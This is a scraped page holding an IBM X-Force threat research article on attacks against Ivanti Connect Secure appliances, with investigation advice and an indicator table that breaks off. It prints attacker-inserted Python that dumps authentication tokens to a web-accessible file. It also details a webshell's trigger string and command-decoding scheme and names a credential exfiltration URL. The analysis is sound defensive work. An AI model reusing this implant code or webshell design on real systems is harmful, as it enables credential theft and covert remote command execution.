megamenu__threat.show, megamenu__podcast.hide, megamenu__events.hide, megamenu__mask.show" role="link" tabindex="0">Threat Research</button> <button type="button" class="navigation__button " data-menu="megamenu__podcast" on="tap:megamenu__news.hide, megamenu__series.hide, megamenu__topics.hide, megamenu__industries.hide, megamenu__threat.hide, megamenu__podcast.show, megamenu__events.hide, megamenu__mask.show" role="link" tabindex="0">Podcast</button> <button type="button" aria-labelledby="search-tablet" class="navigation__search" onclick="document.getElementById('search__input').focus()" on="tap:search.toggleClass(class='megamenu__open')" role="link" tabindex="0"> <amp-img width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/search.svg" alt="Search"></amp-img> </button> </div>  <form id="search" class="search " method="GET" action="/" target="_top" tabindex="-1"> <amp-autocomplete filter="prefix" src="https://securityintelligence.com/wp-content/themes/sapphire/app/jsons/suggestions.json" suggest-first submit-on-enter on="select:search.submit" tabindex="-1"> <input id="search__input" tabindex="-1" type="text" name="s" autocomplete="on" placeholder="What would you like to search for?" aria-label="Search" oninput="validateInput(this)" required> </amp-autocomplete> <button tabindex="-1" value="submit" type="submit" class="search__submit" aria-label="Click to search"> <amp-img width="20" height="20" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/search.svg" alt="Search"></amp-img> <span>Search</span> </button> <button tabindex="-1" value="reset" class="search__close" type="reset" aria-labelledby="search" on="tap:search.toggleClass(class='megamenu__open')" role="link"> <amp-img width="14" height="14" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/close.svg" alt="Close"></amp-img> </button> </form>  <div id="navigation__mega">  <section id="megamenu__news" class="megamenu" data-menu="nav-news" on="tap:megamenu__news.show, megamenu__mask.show" role="link" tabindex="0"> <amp-list layout="responsive" width="1440" height="248" credentials="include" src="https://securityintelligence.com/wp-content/themes/sapphire/app/jsons/posts.php?quantity=4&type=ibm_news" binding="no"> <template type="amp-mustache"> <div class="row">  {{#articles}} <article class="megamenu__article"> <a href="{{permalink}}" class="megamenu__link"> <div class="megamenu__image"> <amp-img width="630" height="330" layout="responsive" src="{{image}}" alt="{{image_alt}}"></amp-img> </div> <h3 class="megamenu__title">{{title}}</h3> </a> </article> {{/articles}}  <a href="/news/" class="megamenu__more"> <amp-img width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/post-type-icons/news.svg" alt="News"></amp-img> <span>View All News</span> </a> </div> </template> </amp-list> </section>   <section id="megamenu__topics" class="megamenu" data-menu="nav-topics" on="tap: megamenu__topics.show, megamenu__mask.show" role="link" tabindex="0"> <div class="row">  <div class="megamenu__list"> <a href="/category/app-security/">Application Security</a> <a href="/category/artificial-intelligence/">Artificial Intelligence</a> <a href="/category/ciso-corner/">CISO</a> <a href="/category/cloud-protection/">Cloud Security</a> <a href="/category/data-protection/">Data Protection</a> <a href="/category/endpoint/">Endpoint</a> </div> <div class="megamenu__list"> <a href="/category/fraud-protection/">Fraud Protection</a> <a href="/category/identity-access/">Identity & Access</a> <a href="/category/incident-response/">Incident Response</a> <a href="/category/mainframe/">Mainframe</a> <a href="/category/network/">Network</a> <a href="/category/risk-management/">Risk Management</a> </div> <div class="megamenu__list"> <a href="/category/security-intelligence-analytics/">Intelligence & Analytics</a> <a href="/category/security-services/">Security Services</a> <a href="/category/threat-hunting/">Threat Hunting</a> <a href="/category/topics/zero-trust/">Zero Trust</a> <a href="/infographic-zero-trust-policy/">Infographic: Zero trust policy</a> <a href="/timeline/state-local-government-cyberattacks/">Timeline: Local Government Cyberattacks</a> </div> <div class="megamenu__list"> <span>Industries</span> <a href="/category/banking-financial-services-industry/">Banking & Finance</a> <a href="/category/energy-utility-industry/">Energy & Utility</a> <a href="/category/government/">Government</a> <a href="/category/health-care-industry/">Healthcare</a> </div>  <a href="/category/topics/" class="megamenu__more"> <amp-img width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/post-type-icons/topics.svg" alt="Topics"></amp-img> <span>View All Topics</span> </a> </div> </section>  <section id="megamenu__threat" class="megamenu" data-menu="nav-x-force" on="tap:megamenu__threat.show, megamenu__mask.show" role="link" tabindex="0"> <amp-list layout="responsive" width="1440" height="248" credentials="include" src="https://securityintelligence.com/wp-content/themes/sapphire/app/jsons/posts.php?quantity=4&category=x-force" binding="no"> <template type="amp-mustache"> <div class="row">  {{#articles}} <article class="megamenu__article"> <a href="{{permalink}}" class="megamenu__link"> <div class="megamenu__image"> <amp-img width="630" height="330" layout="responsive" src="{{image}}" alt="{{image_alt}}"></amp-img> </div> <h3 class="megamenu__title">{{title}}</h3> </a> </article> {{/articles}}  <a href="/x-force/" class="megamenu__more"> <amp-img width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/post-type-icons/threat-research.svg" alt="Threat Research"></amp-img> <span>View More From X-Force</span> </a> </div> </template> </amp-list> </section>  <section id="megamenu__podcast" class="megamenu" data-menu="nav-media" on="tap:megamenu__podcast.show, megamenu__mask.show" role="link" tabindex="0"> <amp-list layout="responsive" width="1440" height="248" credentials="include" src="https://securityintelligence.com/wp-content/themes/sapphire/app/jsons/posts.php?quantity=4&type=ibm_media" binding="no"> <template type="amp-mustache"> <div class="row">  {{#articles}} <article class="megamenu__article"> <a href="{{permalink}}" class="megamenu__link"> <div class="megamenu__image"> <amp-img width="630" height="330" layout="responsive" src="{{image}}" alt="{{image_alt}}"></amp-img> </div> <h3 class="megamenu__title">{{title}}</h3> </a> </article> {{/articles}}  <a href="/media/" class="megamenu__more"> <amp-img width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/post-type-icons/podcast.svg" alt="Podcast"></amp-img> <span>View All Episodes</span> </a> </div> </template> </amp-list> </section> </div>  <div id="megamenu__mask" class="navigation__mask " hidden></div>  <script type="text/javascript"> function validateInput(inputElement) { // Regular expression to allow only letters (both uppercase and lowercase) and numbers var regex = /^[A-Za-z0-9 ]*$/; // Get the current value of the input field var inputValue = inputElement.value; // Check if the input value matches the allowed pattern if (!regex.test(inputValue)) { // If the input contains special characters, remove them inputElement.value = inputValue.replace(/[^A-Za-z0-9 ]/g, ''); } } // DESKTOP MENU LINKS - HOVER ACTION var elementList = document.querySelectorAll('.navigation__menu .navigation__button'); for (i = 0; i < elementList.length; i++) { elementList[i].addEventListener('mouseenter', function() { if (localStorage['megamenu-status'] !== 'first-interaction') { var mega = document.getElementById("navigation__mega"); var menu_elements = document.getElementById(this.dataset.menu); var mask = document.getElementById("megamenu__mask"); menu_elements.click(); mega.classList.add('amp-open'); menu_elements.classList.add('amp-open'); mask.classList.add('amp-open'); } }); elementList[i].addEventListener('mouseleave', function() { if (localStorage['megamenu-status'] !== 'first-interaction') { var mega = document.getElementById("navigation__mega"); var menu_elements = document.getElementById(this.dataset.menu); var mask = document.getElementById("megamenu__mask"); mega.classList.remove('amp-open'); menu_elements.classList.remove('amp-open'); mask.classList.remove('amp-open'); } }); } // TABLET MENU LINKS - CLICK ACTION var elementList = document.querySelectorAll('.navigation__menu--tablet .navigation__button'); for (i = 0; i < elementList.length; i++) { elementList[i].addEventListener('click', function() { var mega = document.getElementById("navigation__mega"); var menu_elements = document.getElementById(this.dataset.menu); var mask = document.getElementById("megamenu__mask"); menu_elements.click(); mega.classList.add('amp-open'); menu_elements.classList.add('amp-open'); mask.classList.add('amp-open'); }); } // OPPENED MEGAMENU - HOVER ACTION var elementList = document.querySelectorAll('.megamenu'); for (i = 0; i < elementList.length; i++) { elementList[i].addEventListener('mouseenter', function() { var mega = document.getElementById("navigation__mega"); var nav_elements = document.getElementById(this.dataset.menu); var mask = document.getElementById("megamenu__mask"); this.classList.add('amp-open'); mega.classList.add('amp-open'); mask.classList.add('amp-open'); nav_elements.classList.add('amp-open'); }); elementList[i].addEventListener('mouseleave', function() { var mega = document.getElementById("navigation__mega"); var nav_elements = document.getElementById(this.dataset.menu); var mask = document.getElementById("megamenu__mask"); this.classList.remove('amp-open'); mega.classList.remove('amp-open'); mask.classList.remove('amp-open'); nav_elements.classList.remove('amp-open'); }); } </script>  <button type="button" aria-labelledby="search-tablet" class="search__mobile__icon" onclick="document.getElementById('search__input').focus()" on="tap:search.toggleClass(class='megamenu__open')" role="link" tabindex="0"> <amp-img width="18" height="18" layout="fixed" src="https://securityintelligence.com/wp-content/themes/sapphire/images/search.svg" alt="Search"></amp-img> </button> <div class="navigation__mobile-icon" on="tap:navigation__mobile.toggleVisibility, navigation__hamburguer.toggleVisibility, navigation__close.toggleVisibility " role="link" tabindex="0"> <amp-img id="navigation__hamburguer" width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/hamburguer.svg" alt="Menu"></amp-img> <amp-img id="navigation__close" width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/close.svg" alt="Close" hidden></amp-img> </div>  <section id="navigation__mobile" class="navigation__mobile-list" hidden> <div class="container"> <a href="/news/">News</a>  <amp-accordion disable-session-states>  <section class="navigation__accordion"> <h2>Topics</h2> <div class="navigation__accordion-content"> <div class="row"> <a href="/category/topics/">All Categories</a> <a href="/category/app-security/">Application Security</a> <a href="/category/identity-access/">Identity & Access</a> <a href="/category/artificial-intelligence/">Artificial Intelligence</a> <a href="/category/incident-response/">Incident Response</a> <a href="/category/ciso-corner/">CISO</a> <a href="/category/mainframe/">Mainframe</a> <a href="/category/cloud-protection/">Cloud Security</a> <a href="/category/mobile-security-podcasts/">Mobile Security</a> <a href="/category/data-protection/">Data Protection</a> <a href="/category/network/">Network</a> <a href="/category/endpoint/">Endpoint</a> <a href="/category/risk-management/">Risk Management</a> <a href="/category/fraud-protection/">Fraud Protection</a> <a href="/category/threat-hunting/">Threat Hunting</a> <a href="/category/security-services/">Security Services</a> <a href="/category/security-intelligence-analytics/">Security Intelligence & Analytics</a> </div> <div class="row"> <span>Industries</span> <a href="/category/industries/banking-financial-services-industry/">Banking & Finance</a> <a href="/category/energy-utility-industry/">Energy & Utility</a> <a href="/category/government/">Government</a> <a href="/category/health-care-industry/">Healthcare</a> </div> </div> </section> </amp-accordion> <a href="/x-force/">X-Force</a> <a href="/media/">Podcast</a> </section> </div> </div> </nav>  <div class="scroll-to-top ">  <div id="top-viewer" class="scroll-to-top__viewer"></div>  <div class="sticky" style="height: 100%;"> <button id="scrollToTopButton" on="tap:top-viewer.scrollTo(duration=200, position=bottom)" class="tap_target "> <div class="scroll-to-top__button"> <amp-img width="12" height="16" layout="fixed" alt="Back-to-top" src="https://securityintelligence.com/wp-content/themes/sapphire/images/scroll-to-top.svg"></amp-img> </div> </button> </div>  <amp-animation id="showAnim" layout="nodisplay"> <script type="application/json"> { "duration": "200ms", "fill": "both", "iterations": "1", "direction": "alternate", "animations": [{ "selector": "#scrollToTopButton", "keyframes": [{ "opacity": "1", "visibility": "visible" }] }] } </script> </amp-animation> <amp-animation id="hideAnim" layout="nodisplay"> <script type="application/json"> { "duration": "200ms", "fill": "both", "iterations": "1", "direction": "alternate", "animations": [{ "selector": "#scrollToTopButton", "keyframes": [{ "opacity": "0", "visibility": "hidden" }] }] } </script> </amp-animation> </div>  <amp-position-observer target="top-viewer" intersection-ratios="0" on="enter:hideAnim.start; exit:showAnim.start" layout="nodisplay"></amp-position-observer>  <script id="post-schema" type="application/ld+json"> { "@context": "http://schema.org", "@type": "Article", "headline": "Widespread exploitation of recently disclosed Ivanti vulnerabilities", "mainEntityOfPage": "https://securityintelligence.com/x-force/exploitation-of-exposed-ivanti-vulnerabilities/", "author": { "@type": "Person", "name": "Richard Emerson" }, "datePublished": "2024-02-23T13:27:00-05:00", "dateModified": "2024-03-06T13:52:47-05:00", "publisher": { "@type": "Organization", "name": "Security Intelligence", "logo":{ "@type": "ImageObject", "url": "https://securityintelligence.com/wp-content/themes/security-intelligence/assets/img/logo.png" } }, "image": [ "https://securityintelligence.com/wp-content/uploads/2024/02/Lock-sign-4-630x330.jpeg" ], "articleBody": "IBM X-Force has assisted several organizations in responding to successful compromises involving the Ivanti appliance vulnerabilities disclosed in January 2024. Analysis of these incidents has identified several Ivanti file modifications that align with current public reporting. Additionally, IBM researchers have observed specific attack techniques involving the theft of authentication token data not readily noted in current public sources. The blog details the results of this research to assist organizations in protecting against these threats. <h2>Key Findings</h2> <ul type="disc"> <li>IBM research teams have directly observed the DSLog backdoor <a href="https://www.orangecyberdefense.com/fileadmin/general/pdf/Ivanti_Connect_Secure_-_Journey_to_the_core_of_the_DSLog_backdoor.pdf">reported </a>in active real-world cyber attacks</li> <li>X-Force also identified modifications to the Ivanti "auth_token.py" file to dump authentication token data to another file, presumably for exfiltration–this observation is distinct from other vendors</li> <li>Organizations can leverage several potential data sources when investigating potential Ivanti appliance compromises.</li> </ul> <h2>Overview</h2> IBM X-Force has been monitoring the evolving campaigns leveraging recently disclosed Ivanti zero days. Initial disclosure by Ivanti was published on January 10th, 2024 and detailed CVE-2023-46805 and CVE-2024-21887 impacting Ivanti Connect Secure and Policy Secure appliances. CVE-2023-46805 pertains to an authentication bypass vulnerability permitting a remote attacker to access restricted resources. The other vulnerability, CVE-2024-21887, is a remote code execution/injection (RCE) vulnerability permitting an authenticated administrator to execute arbitrary commands by sending specially crafted packets. Public <a href="https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day">reporting</a> indicates a threat actor exploited these vulnerabilities against select targets as early as December 2023. Multiple vendors have attributed the initial intrusions to a suspected Chinese threat actor tracked as UTA0178 (aka UNC5221). X-Force is currently unable to corroborate this reporting with sufficient confidence to comment. On January 11th and 12th, following the publication of these vulnerabilities, <a href="https://www.volexity.com/blog/2024/01/15/ivanti-connect-secure-vpn-exploitation-goes-global/">multiple</a> <a href="https://unit42.paloaltonetworks.com/threat-brief-ivanti-cve-2023-46805-cve-2024-21887/">vendors</a> observed mass scanning and exploitation attempts against various organizations. While UTA0178 was reportedly behind some of this increase in activity, similarities in deployed webshells and non-public methodologies have been reported as evidence that these exploits may have been shared with related <a href="https://www.volexity.com/blog/2024/01/15/ivanti-connect-secure-vpn-exploitation-goes-global/">actors</a>. This proliferation of zero-day exploits similar to the initial campaign/s has been observed in widespread use to opportunistically gain footholds in thousands of organizations before or soon after patches were available. This pattern of activity is consistent with prior campaigns also attributed to suspected Chinese threat <a href="https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/">actors</a>. Starting January 16th, proof of concept (POC) exploit code was released for CVE-2023-46805 and CVE-2024-21887. Ivanti disclosed additional vulnerabilities CVE-2024-21893 and CVE-2024-21887 on January 31st for Ivanti Connect Secure, Policy Secure, and ZTA Gateways, with POC exploit code released on February 2nd. CVE-2024-21893 is an SSRF (Server-Side Request Forgery) vulnerability that may permit access to restricted resources without authentication. CVE-2024-21888 is a privilege escalation vulnerability. As of February 8th, Ivanti had identified an additional vulnerability, CVE-2024-22024, which is a XXE vulnerability in Ivanti Connect Secure, Policy Secure, and ZTA Gateways that allows an attacker to access certain restricted resources with authentication. <img src="https://images1.cmp.optimizely.com/Zz03ZjVkMmQ3Y2NjNDQxMWVlYmM3MGNhZmQxMGFkODg1Yw==" alt="remerson_ivanti.png" width="720" height="125.23512747875354" /><i>(Major Events Timeline of Ivanti Vulnerabilities)</i> <h3>Authentication Token Dumper</h3> X-Force identified threat actor modifications to the file auth_token.py to include code designed to dump authentication token data. This file is part of the Python package cav-0.1-py3.6.egg, and is found at the path: <b>/home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/auth_token.py</b>. The CAV Python package was also targeted by the FRAMESTING, WIREFIRE, and CHAINLINE webshells <a href="https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation">observed by Mandiant</a>, however, none of those were reported to target authentication tokens. Our malware analysis team has independently confirmed these particular webshells are being used in combination with the vulnerabilities included in this report. The following code was inserted into auth_token.py: <p data-pm-slice="1 1 ["bullet_list",null,"bullet_list",null,"list_item",null]"><span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">from</span> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">datetime import</span> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">datetime</span> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">ctime =</span> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">datetime.now()</span> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">ftime =</span> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">ctime.strftime("%Y-%m-%d %H:%M:%S")</span> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">data_save =</span> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">{"time":ftime,"token_hash":token_hash,"dsid": dsid, "roles": roles, "role_ids": role_ids,"user_name": user_name}</span> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">with open("/home/webserver/htdocs/dana-na/auth/qrcod.gif","a") as f:</span> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;"> f.write(f"{data_save}\n")</span></p> This code is designed to write information about the generated authentication token to the file <b>/home/webserver/htdocs/dana-na/auth/qrcod.gif</b> The file used (auth_token.py), functionality of the inserted code, and exfiltration path identified by our researchers differ from those reported by other vendors. This may indicate differing tool sets or basic attempts at defense evasion by modifying easily identifiable features used in previous attacks. <h3>DSLog Backdoor</h3> X-Force also identified malicious code for a Perl-based webshell inserted into the legitimate Ivanti file <b>/home/perl/DSLog.pm</b> within a function named <b>Msg</b> which has been named "DSLog Backdoor" by another <a href="https://www.orangecyberdefense.com/fileadmin/general/pdf/Ivanti_Connect_Secure_-_Journey_to_the_core_of_the_DSLog_backdoor.pdf">vendor</a>. A snippet of that function can be seen below, and the lines referencing "webshell code" were inserted for clarity. <p data-pm-slice="1 1 ["bullet_list",null,"bullet_list",null,"list_item",null]"><img src="https://images3.cmp.optimizely.com/Zz1jNWEzODZkZWQyNzgxMWVlYmZiMzY2Y2RiMWY0MTRmMg==" alt="IvantiDisclosure_01-2024_CodeSnip2.png" width="546" height="575.5339805825244" /></p> When run, the webshell code retrieves the HTTP request string and user agent from environment variables. It then checks the user agent for the string '<b>3f4a8724ab807b4f4f167aa95599d5b25e2c8aa6</b>'. As noted in <a href="https://www.orangecyberdefense.com/fileadmin/general/pdf/Ivanti_Connect_Secure_-_Journey_to_the_core_of_the_DSLog_backdoor.pdf">OSINT</a>, X-Force has also observed a SHA256 hash used as a string. If this string is present within the user-agent, the webshell processes the request string, which it expects to be formatted as: <b>&cdi=<hex_formatted_string></b>. These indicators have also not been identified in previous public reporting. The webshell decodes the hex string to ASCII and performs a further ROT-47 decoding operation. It then executes the resulting string using the 'system' command. In addition to the activity described above, we also observed malicious files that correspond with those described in existing reporting. These include the following: <ul type="disc"> <li><b>/home/webserver/htdocs/dana-na/auth/lastauthserverused.js - </b>We identified credential harvesting code inserted into this legitimate file, which was similar to that observed by Mandiant (as WARPWIRE) and <a href="https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/">Volexity</a>. The Login function within the <b>lastauthserverused.js</b> file has been modified to forward login credentials as an HTTP POST request to the URL <b>http[:]//www.ehangmun[.]com/board/selectbox/xml.php</b>.</li> <li><b>/home/venv3/lib/python3.6/site-packages/scanner-0.1-py3.6.egg/scanner/scripts/scanner.py</b> - This is a legitimate file and part of the Integrity Checker Tool. The <b>dumpStats</b> function within the file has been modified to always report zero detected changes. Volexity also observed this behavior.</li> <li><b>/home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg‌/cav/api/resources/visits.py</b> - This is a legitimate file to which webshell code has been added, and is called when the URI /api/v1/cav/client/visits is accessed. This matches the GIFTEDVISITOR webshell reported on by Volexity.</li> </ul> <h3>Ivanti Appliance Investigation Considerations</h3> In regards to Ivanti appliances, after appropriate containment actions have been taken X-Force recommends organizations leverage the external Ivanti Integrity Check Tool (ICT) to identify potential evidence of compromise. The Ivanti ICT is a utility that is designed to check “the integrity of the complete file system and finds any additional/modified file(s)” for ICS and IPS images installed on virtual or hardware appliances, and has been the fastest way to obtain evidence in X-Force's experience. As noted above and by <a href="https://www.volexity.com/blog/2024/01/18/ivanti-connect-secure-vpn-exploitation-new-observations/">others</a>, threat actors have modified the built-in ICT to hide evidence of changes on Ivanti appliances, so running the external ICT is recommended. The output of that scan comes in the form of a TGZ file that is contained inside an encrypted "format" with a hardcoded key. While X-Force recommends working with Ivanti to decrypt the output, there is code available on <a href="https://gist.github.com/rxwx/03a036d8982c9a3cead0c053cf334605">GitHub </a>that can assist with decrypting these files, should the need arise. Analysis work should involve investigating the TGZ file directly to ensure all relevant information of interest, particularly time stamps, is properly collected. In addition to the Ivanti ICT tool output, organizations can also capture disk/memory images, as well as collect and review the User Access Log, Event Log, and Administrator Access Log files from the Admin Console. Preservation of evidence can be critical in ensuring the complete eviction of malicious actors. When possible, X-Force recommends organizations collect forensic images before remediation actions are taken, including resetting the appliance. Mitigation efforts may alert threat actors to detection and once the appliance is rebuilt, important evidence is lost. This may include critical data necessary to determine what actions the threat actor may have taken if the device was compromised. Ivanti support may also be required to decrypt these images for analysis. <h2>Conclusion</h2> Remote access solutions continue to remain an attractive target for threat actors looking to gain a foothold in target environments. For the most recent Ivanti appliance zero-days, X-Force has observed threat actors leverage file modifications to steal authentication token data as well as deploying the DSLog webshell to conduct post-compromise activity (particularly in maintaining persistence, lateral movement, and data exfiltration.) X-Force recommends organizations responding to an Ivanti compromise follow the remediation guidance provided by the vendor, while also taking into account forensic collection requirements. <h2>Recommendations</h2> <ul type="disc"> <li>Follow the recommendations noted in the Ivanti Appliance Investigation Considerations section</li> <li>Ensure a backup of the configuration is saved for the appliance before initiating a factory reset</li> <li>Apply official patches from Ivanti to vulnerable appliances</li> <li>Consider revoking and reissuing appliance-related secrets, API keys, and certificates</li> <li>Consider rotating passwords for users that authenticated to the appliance during the timeframe of compromise</li> <li>Forward Ivanti appliance logs to a centralized location to prevent log tampering, particularly the User and Admin Access Logs, and the Events Logs</li> <li>Investigate implementing and/or leveraging a configuration management solution.</li> </ul> An advance copy of this analysis was provided to X-Force Premier Threat Intelligence (PTI) subscription clients on February 7, 2024. To learn how you can gain advanced insight into X-Force Threat Intelligence products, try a <a href="https://www.ibm.com/products/xforce-exchange/editions">30-day free trial</a> of PTI on <a href="https://exchange.xforce.ibmcloud.com/">X-Force Exchange</a>. <p data-pm-slice="1 1 []"><em>To learn how IBM X-Force can help you with anything regarding cybersecurity including incident response, threat intelligence, or offensive security services </em><a href="https://www.ibm.com/account/reg/us-en/signup?formid=urx-52262" target="_blank" rel="noopener noreferrer nofollow" data-attrib-id="link-49156072-c91c-4860-82c5-1f321e510076"><em>schedule a meeting here</em></a><em>.</em></p> <em>If you are experiencing cybersecurity issues or an incident, contact </em><a href="https://www.ibm.com/x-force" target="_blank" rel="noopener noreferrer nofollow" data-attrib-id="link-1309f73b-683d-491b-a590-c97dc5cc1248"><em>X-Force</em></a><em> to help: US hotline </em><em>1-888-241-9812</em><em> | Global hotline (+001) </em><em>312-212-8034</em><em>.</em> <table class="ScrollTableNormal" style="border-collapse: collapse; border: none;" border="1" cellspacing="0" cellpadding="0"> <thead> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Indicator</span></b></p> </td> <td style="width: 67.7pt; border: solid #DDDDDD 1.0pt; border-left: none; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Indicator Type</span></b></p> </td> <td style="width: 157.95pt; border: solid #DDDDDD 1.0pt; border-left: none; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Context</span></b></p> </td> </tr> </thead> <tbody> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">336d22d5a85319bf9e2567b3964fdc5a</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">MD5</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">Modified lastauthserverused.js file</span></p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">79a1ff16095c2df1356ee9b2d5aeb8b9</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">MD5</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">Modified scanner.py file</span></p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">094433737d3ff87776c4abae6c91aaaf</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">MD5</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">Modified visits.py file</span></p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">6806d0735c49bd7351dda964e84e2c01</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">MD5</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">Modified auth_token.py file to dump authentication token data</span></p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">ae487dcf9219bab971bdc9d6a4ac7022</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">MD5</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">DSLog Backdoor</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">139.162.152.19</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 